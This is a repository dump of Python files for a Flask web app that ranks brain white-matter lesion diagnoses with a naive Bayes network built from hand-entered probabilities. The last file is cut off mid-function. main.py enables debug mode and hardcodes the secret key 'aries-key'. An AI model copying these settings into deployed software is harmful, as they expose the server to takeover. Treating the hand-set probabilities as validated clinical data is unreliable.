"length_bytes": 9417,
"license_type": "no_license",
"max_line_length": 413,
"num_lines": 154,
"path": "/WhiteMatterNetwork.py",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "from easybayesy import NaiveBayesNetworkNode, NaiveBayesNetwork\nimport numpy as np\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\n\ndef WhiteMatterNetwork(): \n network = NaiveBayesNetwork(); \n\n dx = NaiveBayesNetworkNode('Diagnosis',['ADEM','Adrenoleukodystrophy','CADASIL','CNS_Lymphoma','High_Grade_Glioma','HIV_Encephalopathy','Low_Grade_Glioma','Metastatic_disease','Migraine','Multiple_Sclerosis_active','Multiple_Sclerosis_inactive','Multiple_Sclerosis_tumefactive','Neuromyelitis_Optica','PML','PRES','Susac_Syndrome','SVID','Toxic_Leukoencephalopathy','Vascular']) \n dx.category='Diagnosis' \n nDx = 19\n dx.priors = np.array( [0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.054,0.022,0.054,0.054,0.054]) \n network.add_node(dx) \n\n n = NaiveBayesNetworkNode('enhancementRatio',['Large','Small']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.6,0.2,0.2,0.5,0.6,0.2,0.3,0.4,0.2,0.4,0.2,0.5,0.3,0.2,0.2,0.5,0.2,0.2,0.3 ], [ 0.4,0.8,0.8,0.5,0.4,0.8,0.7,0.6,0.8,0.6,0.8,0.5,0.7,0.8,0.8,0.5,0.8,0.8,0.7 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Number',['Single','Multiple']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.4,0.5,0.1,0.4,0.8,0.5,0.9,0.3,0.3,0.2,0.2,0.3,0.5,0.3,0.3,0.3,0.2,0.5,0.3 ], [ 0.6,0.5,0.9,0.6,0.2,0.5,0.1,0.7,0.7,0.8,0.8,0.7,0.5,0.7,0.7,0.7,0.8,0.5,0.7 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('ventVol',['Enlarged','Normal']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.3,0.5,0.6,0.3,0.7,0.2,0.2,0.3,0.4,0.2,0.2,0.1,0.5,0.3,0.2,0.7,0.3,0.7 ], [ 0.8,0.7,0.5,0.4,0.7,0.3,0.8,0.8,0.7,0.6,0.8,0.8,0.9,0.5,0.7,0.8,0.3,0.7,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Chronicity',['Acute','Chronic']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.7,0.1,0.5,0.2,0.3,0.3,0.4,0.5,0.4,0.5,0.2,0.5,0.3,0.5,0.8,0.5,0.2,0.5,0.8 ], [ 0.3,0.9,0.5,0.8,0.7,0.7,0.6,0.5,0.6,0.5,0.8,0.5,0.7,0.5,0.2,0.5,0.8,0.5,0.2 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Susceptibility',['Yes','No']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.2,0.2,0.4,0.3,0.3,0.2,0.4,0.1,0.1,0.1,0.2,0.1,0.1,0.2,0.1,0.1,0.2,0.3 ], [ 0.8,0.8,0.8,0.6,0.7,0.7,0.8,0.6,0.9,0.9,0.9,0.8,0.9,0.9,0.8,0.9,0.9,0.8,0.7 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Enhancement',['Yes','None']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.8,0.7,0.2,0.9,0.9,0.2,0.4,0.9,0.1,0.9,0.1,0.8,0.3,0.5,0.7,0.2,0.1,0.2,0.5 ], [ 0.2,0.3,0.8,0.1,0.1,0.8,0.6,0.1,0.9,0.1,0.9,0.2,0.7,0.5,0.3,0.8,0.9,0.8,0.5 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Cortex',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.5,0.2,0.5,0.8,0.2,0.8,0.6,0.2,0.2,0.2,0.4,0.2,0.6,0.7,0.1,0.1,0.5,0.5 ], [ 0.8,0.5,0.8,0.5,0.2,0.8,0.2,0.4,0.8,0.8,0.8,0.6,0.8,0.4,0.3,0.9,0.9,0.5,0.5 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Symmetry',['Symmetric','Asymmetric']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.8,0.8,0.5,0.4,0.9,0.2,0.5,0.6,0.5,0.5,0.2,0.7,0.2,0.8,0.6,0.8,0.8,0.6 ], [ 0.5,0.2,0.2,0.5,0.6,0.1,0.8,0.5,0.4,0.5,0.5,0.8,0.3,0.8,0.2,0.4,0.2,0.2,0.4 ] ]).transpose() \n network.add_node(n) \n\n n = 
NaiveBayesNetworkNode('Age',['Old','Young','Adult']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.01,0.01,0.1,0.3,0.3,0.1,0.2,0.4,0.1,0.05,0.05,0.01,0.2,0.1,0.2,0.1,0.7,0.3,0.65 ], [ 0.75,0.7,0.4,0.1,0.3,0.5,0.4,0.2,0.5,0.7,0.7,0.8,0.4,0.5,0.5,0.6,0.01,0.3,0.05 ], [ 0.24,0.29,0.5,0.6,0.4,0.4,0.4,0.4,0.4,0.25,0.25,0.19,0.4,0.4,0.3,0.3,0.29,0.4,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Immunocompromised',['Yes','No']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.1,0.1,0.1,0.6,0.1,0.9,0.1,0.5,0.1,0.3,0.3,0.3,0.2,0.9,0.2,0.1,0.1,0.5,0.1 ], [ 0.9,0.9,0.9,0.4,0.9,0.1,0.9,0.5,0.9,0.7,0.7,0.7,0.8,0.1,0.8,0.9,0.9,0.5,0.9 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Diffusion',['Restricted','Normal']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.6,0.7,0.2,0.9,0.7,0.3,0.3,0.5,0.1,0.4,0.1,0.4,0.3,0.7,0.3,0.3,0.1,0.6,0.7 ], [ 0.4,0.3,0.8,0.1,0.3,0.7,0.7,0.5,0.9,0.6,0.9,0.6,0.7,0.3,0.7,0.7,0.9,0.4,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Anterior_Temporal',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.2,0.7,0.2,0.2,0.3,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.3,0.2 ], [ 0.8,0.8,0.3,0.8,0.8,0.7,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.7,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('CorpusCallosum',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.8,0.5,0.7,0.8,0.4,0.2,0.5,0.3,0.6,0.6,0.5,0.6,0.4,0.2,0.8,0.2,0.8,0.2 ], [ 0.5,0.2,0.5,0.3,0.2,0.6,0.8,0.5,0.7,0.4,0.4,0.5,0.4,0.6,0.8,0.2,0.8,0.2,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Periventricular',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.7,0.7,0.7,0.7,0.7,0.7,0.3,0.7,0.7,0.7,0.7,0.7,0.7,0.7,0.5,0.7,0.7,0.7,0.7 ], [ 0.3,0.3,0.3,0.3,0.3,0.3,0.7,0.3,0.3,0.3,0.3,0.3,0.3,0.3,0.5,0.3,0.3,0.3,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Sex',['Male','Female']) \n n.category = 'Clincal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.8,0.5,0.6,0.55,0.5,0.5,0.5,0.4,0.2,0.2,0.2,0.3,0.5,0.3,0.2,0.5,0.5,0.4 ], [ 0.5,0.2,0.5,0.4,0.45,0.5,0.5,0.5,0.6,0.8,0.8,0.8,0.7,0.5,0.7,0.8,0.5,0.5,0.6 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Prodrome',['Yes','No']) \n n.category = 'Clinical'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.2,0.2,0.2,0.2,0.3,0.2,0.2,0.2,0.2,0.2,0.2,0.2,0.3,0.2,0.2,0.2,0.2,0.2 ], [ 0.5,0.8,0.8,0.8,0.8,0.7,0.8,0.8,0.8,0.8,0.8,0.8,0.8,0.7,0.8,0.8,0.8,0.8,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('T2',['Decreased','Increased','Normal']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01 ], [ 0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98,0.98 ], [ 0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01,0.01 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('T1',['Decreased','Increased','Normal']) \n n.category = 'Signal'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.3,0.4,0.4,0.5,0.4,0.4,0.6,0.3,0.45,0.6,0.35,0.4,0.3,0.6,0.4,0.5,0.4,0.5,0.4 ], [ 
0.1,0.2,0.1,0.2,0.4,0.1,0.1,0.4,0.05,0.05,0.05,0.2,0.1,0.1,0.1,0.1,0.1,0.1,0.2 ], [ 0.6,0.4,0.5,0.3,0.2,0.5,0.3,0.3,0.5,0.35,0.6,0.4,0.7,0.3,0.5,0.4,0.5,0.4,0.4 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Mass_effect',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.2,0.1,0.1,0.5,0.9,0.1,0.5,0.5,0.1,0.1,0.1,0.4,0.1,0.2,0.1,0.1,0.1,0.3,0.2 ], [ 0.8,0.9,0.9,0.5,0.1,0.9,0.5,0.5,0.9,0.9,0.9,0.6,0.9,0.8,0.9,0.9,0.9,0.7,0.8 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Size',['Small','Large','Medium']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.3,0.2,0.2,0.2,0.1,0.2,0.15,0.3,0.7,0.5,0.7,0.1,0.3,0.1,0.1,0.3,0.2,0.1,0.1 ], [ 0.3,0.6,0.5,0.5,0.6,0.5,0.35,0.4,0.1,0.2,0.1,0.5,0.3,0.6,0.4,0.3,0.4,0.6,0.4 ], [ 0.4,0.2,0.3,0.3,0.3,0.3,0.5,0.3,0.2,0.3,0.2,0.4,0.4,0.3,0.5,0.4,0.4,0.3,0.5 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Lobar_Distribution',['Frontal','Temporal','Parietal','Occipital']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.25,0.2,0.4,0.25,0.4,0.25,0.4,0.25,0.4,0.25,0.25,0.25,0.25,0.4,0.05,0.25,0.25,0.25,0.4 ], [ 0.25,0.1,0.4,0.25,0.3,0.25,0.3,0.25,0.25,0.25,0.25,0.25,0.25,0.1,0.1,0.25,0.25,0.25,0.1 ], [ 0.25,0.35,0.1,0.25,0.2,0.25,0.2,0.25,0.25,0.25,0.25,0.25,0.25,0.4,0.25,0.25,0.25,0.25,0.4 ], [ 0.25,0.35,0.1,0.25,0.1,0.25,0.1,0.25,0.1,0.25,0.25,0.25,0.25,0.1,0.6,0.25,0.25,0.25,0.1 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('Juxtacortical',['Yes','No']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.7,0.5,0.8,0.6,0.9,0.8,0.9,0.7,0.8,0.8,0.8,0.8,0.7,0.8,0.9,0.7,0.7,0.8,0.7 ], [ 0.3,0.5,0.2,0.4,0.1,0.2,0.1,0.3,0.2,0.2,0.2,0.2,0.3,0.2,0.1,0.3,0.3,0.2,0.3 ] ]).transpose() \n network.add_node(n) \n\n n = NaiveBayesNetworkNode('lesionExtent',['Limited','Extensive']) \n n.category = 'Spatial'\n n.parent = 'Diagnosis' \n n.probs = np.array( [ [ 0.5,0.2,0.2,0.2,0.2,0.2,0.8,0.5,0.9,0.6,0.6,0.3,0.7,0.3,0.5,0.8,0.5,0.2,0.5 ], [ 0.5,0.8,0.8,0.8,0.8,0.8,0.2,0.5,0.1,0.4,0.4,0.7,0.3,0.7,0.5,0.2,0.5,0.8,0.5 ] ]).transpose() \n network.add_node(n) \n\n network.categories = ['Signal', 'Spatial', 'Clinical'] \n return network\n"
},
{
"alpha_fraction": 0.5716515183448792,
"alphanum_fraction": 0.5751625299453735,
"avg_line_length": 28.922178268432617,
"blob_id": "1b8182f515f1a386e745da461946ff303422a245",
"content_id": "7b27e031113cf1811070f722cfa3b2ea133ca27c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7690,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 257,
"path": "/main.py",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "# [START app]\nimport logging\n\n# [START imports]\nfrom flask import Flask, render_template, request\nimport flask\nfrom flask_bootstrap import Bootstrap\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField\nfrom wtforms.validators import DataRequired\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\n#import numpy as np\nimport os\nimport imp\nimport csv\nimport copy\nimport time\nimport numpy as np\nfrom easybayesy import NaiveBayesNetworkNode, NaiveBayesNetwork\nfrom WhiteMatterNetwork import WhiteMatterNetwork\n\nhasClosed = False\ntry:\n imp.find_module('BasalGangliaNetwork')\n hasClosed = True\n from BasalGangliaNetwork import BasalGangliaNetwork\nexcept ImportError:\n hasClosed = False\n# [END imports]\n\n\n\n\n# [START create_app]\napp = Flask(__name__)\napp.debug = True\napp.config['SECRET_KEY'] = 'aries-key'\n\napp.highlight = False\napp.highlightText = \"Highlight most discriminating features\"\n\napp.highlightTurnOn = 'Highlight most discriminating features'\napp.highlightTurnOff = ' Remove feature highlighting '\napp.setDxTitle = 'cleardx'\napp.hasClosed = hasClosed\n\napp.networks = [ 'White Matter' ]\nif hasClosed:\n app.networks.append('Basal Ganglia')\n\n\n\nBootstrap(app)\n# [END create_app]\n\n\ndef getPreviousFeatures( network, form ):\n previousFeatures = {}\n for k in form.keys():\n parts = k.split(\":\")\n if ( len(parts)==2 ) and (parts[0] == \"last\"):\n if network.has_node(parts[1]):\n previousFeatures[parts[1]] = form[k]\n return previousFeatures\n\ndef getNetwork( networkName ):\n if networkName == 'Basal Ganglia':\n return BasalGangliaNetwork()\n elif networkName == 'White Matter':\n return WhiteMatterNetwork()\n return None\n\[email protected]('/about')\ndef about():\n return render_template('about.html', page='about')\n\[email protected]('/', methods=['GET','POST'])\[email protected]('/index', methods=['GET','POST'])\ndef index():\n\n print('%%%% index %%%%')\n print request.method\n\n highlightText = flask.current_app.highlightTurnOn\n highlightOn = \"0\"\n\n lastDx = flask.current_app.setDxTitle\n setDx = ''\n\n # For setting all features by diagnosis\n features = request.form.to_dict()\n\n\n networkName = flask.current_app.networks[0]\n lastNetwork = networkName\n\n ignoreFeatures = False\n\n if request.method == \"GET\":\n print( \"*** GET action ***\")\n print(features)\n\n previousFeatures = {}\n\n if features.has_key('lastHighlight'):\n highlightOn = features['lastHighlight']\n\n if features.has_key('lastNetwork'):\n lastNetwork = features['lastNetwork']\n\n network = getNetwork( lastNetwork )\n\n dxList = network.get_node_states(\"Diagnosis\")\n\n if request.method == \"POST\":\n\n #print(features)\n\n\n print( \"*** POST action ***\")\n print( '--- Features ---')\n for k in features.keys():\n print( k + '=' + features[k])\n print( '--- End Features ---')\n\n if 'Network' in features:\n if features['Network'] != features['lastNetwork']:\n print(\"*** ACTION -> CHANGE NETWORK\")\n lastNetwork = features['Network']\n ignoreFeatures = True\n network = getNetwork(lastNetwork)\n dxList = network.get_node_states(\"Diagnosis\")\n\n if 'ClearDiagnosis' in features:\n print(\"*** ACTION -> CLEAR\")\n setDx = 'cleardx'\n ignoreFeatures = True\n\n if features.has_key('HighlightFeatures'):\n print(\"HighlightFeatures is present\")\n highlightAction = features['HighlightFeatures']\n if highlightAction == flask.current_app.highlightTurnOn:\n if highlightOn == \"0\":\n print(\"*** ACTION -> HIGHLIGHT ON\")\n highlightOn = \"1\"\n 
highlightText = flask.current_app.highlightTurnOff\n elif highlightAction == flask.current_app.highlightTurnOff:\n if highlightOn == \"1\":\n print(\"*** ACTION -> HIGHLIGHT OFF\")\n highlightOn = \"0\"\n highlightText = flask.current_app.highlightTurnOn\n for n in network.nodeMap.keys():\n network.nodes[ network.nodeMap[n] ].sensitive = ''\n else:\n if highlightOn == \"0\":\n highlightText = flask.current_app.highlightTurnOn\n elif highlightOn == \"1\":\n highlightText = flask.current_app.highlightTurnOff\n\n # Check if the 'SetDiagnosis' menu has changed\n if setDx == '':\n setDx = features.get('SetDiagnosis')\n lastDx = features.get('lastDx')\n if setDx != lastDx:\n print( '*** ACTION -> SET_DIAGNOSIS' )\n ignoreFeatures = True\n lastDx = setDx\n if ( setDx=='cleardx'):\n for n in network.nodes:\n network.clear_node_state(n.name)\n else:\n dxIndex = dxList.index( setDx )\n network.set_node_states_by_result( dxIndex )\n\n # Set all network FeatureSelect\n previousFeatures = getPreviousFeatures(network, features)\n\n\n if not(ignoreFeatures):\n for k in features.keys():\n parts = features.get(k).split(\":\")\n if network.has_node(k):\n state = ''\n if ( len(parts) > 1 ):\n network.set_node_state(k, parts[1] )\n state = parts[1]\n else:\n network.clear_node_state(k)\n\n if state != previousFeatures[k]:\n setDx = 'cleardx'\n lastDx = 'cleardx'\n print(k + \" changed from \" + previousFeatures[k] + ' to ' + state)\n\n\n\n print(\"solve network: \" + lastNetwork)\n sorted, mat = network.get_diagnoses(False)\n radSorted, radMat = network.get_diagnoses(True)\n\n dx = []\n dxRad = []\n\n maxDx = 10\n if len(sorted) < maxDx:\n maxDx = len(sorted)\n\n cumSum = 0\n for i in range(maxDx):\n cumSum += mat[sorted[i]]\n dx.append( (dxList[sorted[i]],mat[sorted[i]],cumSum) )\n\n cumSum = 0\n for i in range(len(radSorted)):\n cumSum += radMat[radSorted[i]]\n dxRad.append( (dxList[radSorted[i]],radMat[radSorted[i]],cumSum) )\n\n if highlightOn == \"1\":\n print('Calculating sensitivities')\n for cat in network.categories:\n #print(cat)\n nodes = network.names_of_nodes_in_category(cat)\n maxSens = 0\n maxName = ''\n for n in nodes:\n network.nodes[ network.nodeMap[n] ].sensitive = ''\n if network.nodes[ network.nodeMap[n] ].value == '':\n s = network.calculate_node_sensitivity(n, mat)\n #print( n + ' ' + str(s))\n if s > maxSens:\n maxSens = s\n maxName = n\n if maxName != '':\n network.nodes[ network.nodeMap[maxName] ].sensitive = 'sensitive'\n\n print('highlightOn = ' + highlightOn)\n\n return render_template('index.html',\n network=network,\n dx=dx,\n dxRad=dxRad,\n dxLength=len(dx),\n page='index',\n setDx=setDx,\n lastDx=lastDx,\n highlight=highlightText,\n highlightOn=highlightOn,\n networks=flask.current_app.networks,\n networkName=lastNetwork )\n\[email protected](500)\ndef server_error(e):\n # Log the error and stacktrace.\n logging.exception('An error occurred during a request.')\n return 'An internal error occurred.', 500\n# [END app]\n"
},
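The Flask view above round-trips the user's prior selections through hidden `last:<node>` form fields, which `getPreviousFeatures` then parses back into a dict. A minimal standalone sketch of that convention (node names and form values here are illustrative, not from the repo):

```python
# Hypothetical form payload: "last:<node>" keys carry the previous selection.
form = {
    "last:T1 Signal": "T1 Signal:Hyperintense",
    "last:Location": "Location:Pons",
    "HighlightFeatures": "Highlight most discriminating features",  # unrelated key
}

def previous_features(form, node_names):
    previous = {}
    for key, value in form.items():
        parts = key.split(":")
        # keep only well-formed "last:<node>" keys for nodes the network knows
        if len(parts) == 2 and parts[0] == "last" and parts[1] in node_names:
            previous[parts[1]] = value
    return previous

print(previous_features(form, {"T1 Signal", "Location"}))
# {'T1 Signal': 'T1 Signal:Hyperintense', 'Location': 'Location:Pons'}
```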
{
"alpha_fraction": 0.4959278404712677,
"alphanum_fraction": 0.5012452006340027,
"avg_line_length": 29.88565444946289,
"blob_id": "d675d447d63d21d4e057e400b48e99ed44a557b8",
"content_id": "f57e5741bdcbc209af33b4e569b65f3b47c0dd27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14857,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 481,
"path": "/easybayesy.py",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "\n# [START app]\nimport logging\n\n# [START imports]\n#from flask import Flask, render_template, request\n#import flask\n#from flask_bootstrap import Bootstrap\n#from flask_wtf import FlaskForm\n#from wtforms import StringField\n#from wtforms.validators import DataRequired\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\n#import numpy as np\n#import os\nimport csv\nimport time\nimport numpy as np\nimport sys\n# [END imports]\n\n\n\n\nclass NaiveBayesNetworkNode:\n\n # Initializer\n def __init__(self, name, states):\n #self.name = name.replace('_', ' ')\n self.name = name\n self.states = states\n self.parent = ''\n self.category = ''\n self.menuStates = []\n self.menuStates.append(self.name)\n for s in self.states:\n self.menuStates.append(self.name+\":\"+s)\n self.value = ''\n self.menuValue = ''\n self.priors = np.ones(len(self.states))\n self.priors = self.priors / len(self.priors)\n self.probs = []\n self.hasChoice = ''\n self.sensitive = ''\n self.style = ''\n self.modified = time.time()\n\n\n def set_parent(self, node):\n self.parent = node.name\n\n def is_state_selected(self, menuChoice):\n if menuChoice == self.menuValue:\n return 'selected'\n return ''\n\n\n\nclass NaiveBayesNetwork:\n\n def __init__(self):\n self.filename = \"\"\n self.name = \"ExampleNetwork\"\n self.categories = [\"Signal\", \"Spatial\", \"Time\", \"Miscellaneous\", \"Clinical\"];\n self.nodes = []\n self.nodeMap = {}\n self.modified = time.time()\n\n # Set all node states to clear\n def reset(self):\n self.modified = time.time()\n for n in self.nodes:\n self.clear_node_state(n.name)\n\n def add_node(self, node):\n self.modified = time.time()\n self.nodes.append(node)\n self.nodeMap[node.name] = len(self.nodes)-1\n #print( node.name + str( len(self.nodes)-1 ))\n\n def has_node(self,name):\n return self.nodeMap.has_key(name)\n\n def get_node(self, name):\n if self.has_node(name):\n return self.nodes[ self.nodeMap[name] ]\n return None\n\n def get_node_states(self, name):\n if self.has_node(name):\n return self.nodes[ self.nodeMap[name] ].states\n return None\n\n def set_node_state(self, name, state):\n if self.has_node(name):\n self.modified = time.time()\n n = self.nodeMap[name]\n if state in self.nodes[n].states:\n self.nodes[n].value = state\n self.nodes[n].menuValue = self.nodes[n].name + ':' + state\n self.nodes[n].hasChoice = 'hasChoice'\n self.nodes[n].sensitive = ''\n else:\n raise Exception(\"Invalid state set: \" + state )\n\n def set_node_states_by_result(self, index):\n self.modified = time.time()\n for n in self.nodes:\n if n.name != 'Diagnosis':\n vals = n.probs[index,:].tolist()\n state = vals.index(max(vals))\n self.set_node_state(n.name, n.states[state])\n\n def clear_node_state(self, name):\n if self.has_node(name):\n self.modified = time.time()\n n = self.nodeMap[name]\n self.nodes[n].value = ''\n self.nodes[n].menuValue = ''\n self.nodes[n].hasChoice = ''\n else:\n raise Exception(\"Node does not exist: \" + name )\n\n def set_node_probs(self, name, probs):\n if self.has_node(name):\n self.modified = time.time()\n n = self.nodeMap[name]\n self.nodes[n].probs = probs\n else:\n raise Exception(\"Node does not exist: \" + name )\n\n def get_node_priors(self, name):\n if self.has_node(name):\n return( self.nodes[ self.nodeMap[name] ].priors)\n return None\n\n def get_node_category(self, name):\n if self.has_node(name):\n return( self.nodes[ self.nodeMap[name] ].category)\n return None\n\n def number_of_nodes_in_category(self,category):\n count = 0\n for n in self.nodes:\n 
if n.category == category:\n count = count + 1\n return count\n\n def names_of_nodes_in_category(self,category):\n names = []\n for n in self.nodes:\n if n.category == category:\n names.append(n.name)\n return names\n\n def nodes_in_category(self,category):\n nodes = []\n for n in self.nodes:\n if n.category == category:\n nodes.append(n)\n return nodes\n\n def read_csv(self, network_file):\n self.filename = network_file\n self.modified = time.time()\n\n diseases = []\n diseasePrior = []\n nodeNames = []\n nodeCategories = []\n nodeStates = []\n\n self.categories = []\n prob = []\n\n with open(self.filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n allNodeStates = row[2:len(row)]\n\n for n in allNodeStates:\n nodeParts = n.split(\":\")\n nodeCategories.append(nodeParts[0])\n nodeNames.append(nodeParts[1])\n nodeStates.append(nodeParts[2])\n\n for n in np.unique(nodeNames):\n states = []\n cat = ''\n for i in range(0,len(nodeNames)):\n if nodeNames[i] == n:\n states.append(nodeStates[i])\n cat = nodeCategories[i]\n node = NaiveBayesNetworkNode(n,states)\n node.category = cat\n node.parent = \"Diagnosis\"\n self.add_node(node)\n\n else:\n diseases.append(row[0])\n diseasePrior.append(row[1])\n rValues = row[2:]\n prob.append(rValues)\n\n\n line_count += 1\n\n prob = np.vstack(prob)\n\n for n in self.nodes:\n nMat = np.empty((len(diseases), len(n.states) ))\n for s in range(0, len(n.states)):\n for i in range(0,len(nodeNames)):\n if nodeNames[i] == n.name and n.states[s] == nodeStates[i]:\n nMat[:,s] = prob[:,i]\n\n self.set_node_probs( n.name, nMat )\n\n dNode = NaiveBayesNetworkNode(\"Diagnosis\", diseases)\n dNode.category = \"Diagnosis\"\n dNode.priors = diseasePrior\n self.add_node(dNode)\n self.categories = np.unique(nodeCategories)\n\n def calculate_node_sensitivity(self, name, currentProbs):\n\n if ( not(self.has_node(name)) ):\n return 0\n\n node = self.nodes[ self.nodeMap[name] ]\n val = node.value\n probs = self.get_node_priors(\"Diagnosis\")*0\n\n for v in range(len(node.states)):\n self.set_node_state(node.name, node.states[v])\n s, vProbs = self.get_diagnoses(False)\n probs += vProbs / ( currentProbs * node.probs[:,v] )\n probs[np.isnan(probs)] = 0\n\n if val == '':\n self.clear_node_state(node.name)\n else:\n self.set_node_state(node.name, val)\n\n sens = probs.sum()\n return sens\n\n\n def get_diagnoses(self, isRadiologic):\n mat = []\n if not(isRadiologic):\n mat.append(self.get_node_priors(\"Diagnosis\"))\n else:\n unityPrior = []\n dis = self.get_node_priors(\"Diagnosis\")\n for x in dis:\n unityPrior.append(1.0/len(dis))\n mat.append(unityPrior)\n\n for n in self.nodes:\n if (n.value != ''):\n if not(isRadiologic):\n idx = n.states.index(n.value)\n #print(n.name + ' ' + str(idx) + ' ' + n.value)\n #print(n.probs)\n #print( n.probs[:,idx])\n mat.append( n.probs[:,idx])\n elif (n.category != \"Clinical\"):\n #print(n.category + n.name)\n idx = n.states.index(n.value)\n mat.append( n.probs[:,idx])\n\n\n mat = np.vstack(mat)\n mat = mat.astype('double')\n mat = np.prod(mat, axis=0)\n mat = mat/np.sum(mat)\n sorted = np.argsort(mat)\n sorted = sorted[::-1]\n return sorted, mat\n\n\n def read_sheet(self, table_file, tableName):\n # tableDir = \"/home/jiancong/Desktop/projects/BayesNet/NaiveBayes/BasalGanglia/BG_Bayesian_network_NaiveBayes.xlsx\"\n # tableName = \"BGnetwork\"\n self.filename = table_file\n self.name = tableName\n self.modified = time.time()\n\n 
wb=openpyxl.load_workbook(table_file)\n worksheet = wb[tableName]\n\n #Read the keys\n rows = list(worksheet.rows)\n first_row = rows[0]\n second_row = rows[1]\n\n keys = [c.value for c in first_row]\n values = [c.value for c in second_row]\n\n values = [v for v in values if v is not None]\n keys = keys[:len(values)]\n\n values = values[1:]\n keys = keys[1:]\n\n key_value_dict = {}\n\n current_k = \"\"\n for k, v, i in zip(keys, values, range(2, len(values) + 2)):\n if k is not None:\n current_k = k.split(\" \")[0].upper()\n key_value_dict[current_k] = {v.split(\" \")[0].upper():i - 2}\n else:\n key_value_dict[current_k][v.split(\" \")[0].upper()] = i - 2\n\n # Read the probabilty\n disease = []\n prob = []\n for row in rows[2:]:\n row_values = [c.value for c in row if c.value is not None]\n\n if len(row_values) ==0:\n break\n\n if row_values[0] is None:\n break\n disease.append(row_values[0])\n prob.append(row_values[1:])\n prob = np.array(prob)\n prob = prob/100.0\n\n return disease, prob, key_value_dict\n\n def sheet_to_class(self, table_file, tableName, classFileName, className):\n # tableDir = \"/home/jiancong/Desktop/projects/BayesNet/NaiveBayes/BasalGanglia/BG_Bayesian_network_NaiveBayes.xlsx\"\n # tableName = \"BGnetwork\"\n\n file = 